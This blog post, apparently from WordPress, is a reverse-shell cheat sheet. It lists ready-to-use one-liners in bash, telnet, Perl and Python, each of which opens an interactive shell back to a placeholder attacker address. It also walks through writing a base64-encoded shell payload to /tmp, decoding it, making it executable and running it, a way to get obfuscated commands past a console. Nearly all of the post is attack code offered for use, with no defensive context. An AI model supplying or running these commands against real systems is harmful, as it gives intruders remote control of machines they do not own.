Reverse Shell Cheat Sheet (Backconnect)

Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Telnet Reverse Shell

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Note: In some case, we need to provide the encoded payload to the console, I recommend the solution:

Write file to

echo ZXhlYyAvYmluL2Jhc2ggMCYwIDI+JjA= | tee /tmp/ex.txt

Decode

cat /tmp/ex.txt| base64 -d | tee /tmp/ex2.txt

change to file sh

mv /tmp/ex2.txt /tmp/ex2.sh

chmod

chmod +x /tmp/ex2.sh

Excute

/bin/sh /tmp/ex2.sh

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: